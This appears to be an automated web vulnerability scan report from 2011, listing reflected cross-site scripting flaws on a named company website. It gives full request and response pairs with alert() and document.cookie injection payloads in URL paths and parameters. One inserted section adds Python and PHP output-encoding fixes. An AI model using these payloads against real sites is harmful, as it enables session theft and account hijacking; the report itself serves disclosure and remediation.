HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:55:53 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:55:54 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34954
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter/assetsc4ce4';alert(1)//2450813036d/css/style.php?width=900> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 502ee'%3balert(1)//6677cb98bd5 was submitted in the REST URL parameter 4. This input was echoed as 502ee';alert(1)//6677cb98bd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/css502ee'%3balert(1)//6677cb98bd5/style.php HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:00:35 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:35 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34858
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter/assets/css502ee';alert(1)//6677cb98bd5/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c56e'%3balert(1)//e28e1c15d7e was submitted in the REST URL parameter 5. This input was echoed as 3c56e';alert(1)//e28e1c15d7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/css/3c56e'%3balert(1)//e28e1c15d7e?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:59:02 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:59:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter/assets/css/3c56e';alert(1)//e28e1c15d7e?width=900> ...[SNIP]...
The value of the arrows request parameter is copied into the HTML document as plain text between tags. The payload b5d83<img%20src%3da%20onerror%3dalert(1)>4f4823ddc4c was submitted in the arrows parameter. This input was echoed as b5d83<img src=a onerror=alert(1)>4f4823ddc4c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.pngb5d83<img%20src%3da%20onerror%3dalert(1)>4f4823ddc4c&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload f5c9a<img%20src%3da%20onerror%3dalert(1)>8f85a556a2c was submitted in the height parameter. This input was echoed as f5c9a<img src=a onerror=alert(1)>8f85a556a2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25f5c9a<img%20src%3da%20onerror%3dalert(1)>8f85a556a2c&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The value of the linkcolor request parameter is copied into the HTML document as plain text between tags. The payload 4b6fe<img%20src%3da%20onerror%3dalert(1)>bb650400574 was submitted in the linkcolor parameter. This input was echoed as 4b6fe<img src=a onerror=alert(1)>bb650400574 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac4b6fe<img%20src%3da%20onerror%3dalert(1)>bb650400574&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The value of the linkhover request parameter is copied into the HTML document as plain text between tags. The payload c46d1<img%20src%3da%20onerror%3dalert(1)>562579a2c10 was submitted in the linkhover parameter. This input was echoed as c46d1<img src=a onerror=alert(1)>562579a2c10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1c46d1<img%20src%3da%20onerror%3dalert(1)>562579a2c10 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 68b0f<img%20src%3da%20onerror%3dalert(1)>df846d65303 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68b0f<img src=a onerror=alert(1)>df846d65303 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=03/68b0f<img%20src%3da%20onerror%3dalert(1)>df846d653039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
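The two contexts reported in this section, a value spliced into the single-quoted var data = '...' literal of the com_stalytics2 heat-map tracker and a value echoed as HTML text by style.php, need two different encoders, and neither is served by the generic advice to "avoid echoing". The following is an added example, not the application's code, written in Python so it can be executed here; the vulnerable renderers reproduce the pattern visible in the captured responses, and the hardened ones show the correct encoding for each context. SITE, the function names and the style.php message text are assumptions.

```python
"""Vulnerable and hardened renderers for the two reflection contexts in the
report: a tainted value inside a JS string literal in <script>, and a tainted
value echoed as HTML text.
"""
import html
import json

SITE = "http://www.karmasphere.com"   # assumed origin, as seen in the captured script


def tracker_script_vulnerable(request_uri):
    """The pattern visible in the captured 404 page: the request path is
    concatenated straight into a single-quoted JS literal, so an apostrophe
    in the path closes the literal."""
    return ("var data = 'url=" + SITE + request_uri
            + "&title=__404__&x='+clickX+'&y='+clickY;")


def js_string_literal(value):
    """Encode `value` as a JS string literal that is safe inside <script>.
    json.dumps (ensure_ascii) escapes backslashes, double quotes, control
    characters and all non-ASCII, including the JS line terminators
    U+2028/U+2029.  The extra pass turns the double quote into \\u0022 and
    ', <, > and & into \\uXXXX too, so the literal can never contain an
    apostrophe, a '</script>' sequence or an entity, whatever surrounds it."""
    inner = json.dumps(value)[1:-1]
    inner = inner.replace('\\"', "\\u0022")
    for ch in "'<>&":
        inner = inner.replace(ch, "\\u%04x" % ord(ch))
    return '"' + inner + '"'


def tracker_script_hardened(request_uri):
    """Same statement, but the tainted value travels through the encoder and
    the literal's delimiters belong to the encoder, not to the template."""
    return ("var data = 'url=" + SITE + "' + " + js_string_literal(request_uri)
            + " + '&title=__404__&x=' + clickX + '&y=' + clickY;")


def echo_html_vulnerable(value):
    """style.php-style echo of a request parameter as raw HTML text."""
    return "<p>Unknown value: " + value + "</p>"


def echo_html_hardened(value):
    """HTML text context: escape &, <, > and, with quote=True, \" and '."""
    return "<p>Unknown value: " + html.escape(value, quote=True) + "</p>"


def literal_is_inert(literal, original):
    """A rendered literal is inert if nothing between its delimiters could
    close the literal, open a tag or end the JS line, and it still decodes
    to the original value (no data loss from the encoding)."""
    inner = literal[1:-1]
    return (literal[0] == literal[-1] == '"'
            and not any(c in inner for c in "\"'<>&\r\n\u2028\u2029")
            and json.loads(literal) == original)


# URL-decoded probes from the report, as the server would see them.
JS_PROBE_URI = "/components/com_stalytics275355';alert(1)//4be87ff6666/stalytics.php"
HTML_PROBE = "style1.pngb5d83<img src=a onerror=alert(1)>4f4823ddc4c"

if __name__ == "__main__":
    print("vulnerable:", tracker_script_vulnerable(JS_PROBE_URI))
    print("hardened:  ", tracker_script_hardened(JS_PROBE_URI))
    print("inert:", literal_is_inert(js_string_literal(JS_PROBE_URI), JS_PROBE_URI))
    print("vulnerable:", echo_html_vulnerable(HTML_PROBE))
    print("hardened:  ", echo_html_hardened(HTML_PROBE))
```

The PHP equivalents for the application itself are json_encode($value, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP) for the script context and htmlspecialchars($value, ENT_QUOTES, 'UTF-8') for the HTML text context. Note that the Server and X-Powered-By headers in these responses advertise PHP/5.2.15, which predates the JSON_HEX_* flags (added in 5.3.0); on that version the json_encode output has to be post-processed for those four characters exactly as the Python above does, or the platform upgraded. Both encoders must be applied at the point of output, per context, not once at input time.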
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ce15'%3balert(1)//37457d85594 was submitted in the REST URL parameter 5. This input was echoed as 3ce15';alert(1)//37457d85594 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assets/js/3ce15'%3balert(1)//37457d85594 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:53:27 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:53:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34838
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter/assets/js/3ce15';alert(1)//37457d85594&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45a90'%3balert(1)//1f6e5c52185 was submitted in the REST URL parameter 7. This input was echoed as 45a90';alert(1)//1f6e5c52185 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /plugins/system/cdscriptegrator/libraries/highslide/css/45a90'%3balert(1)//1f6e5c52185 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:51:41 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:51:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34864
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/plugins/system/cdscriptegrator/libraries/highslide/css/45a90';alert(1)//1f6e5c52185&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...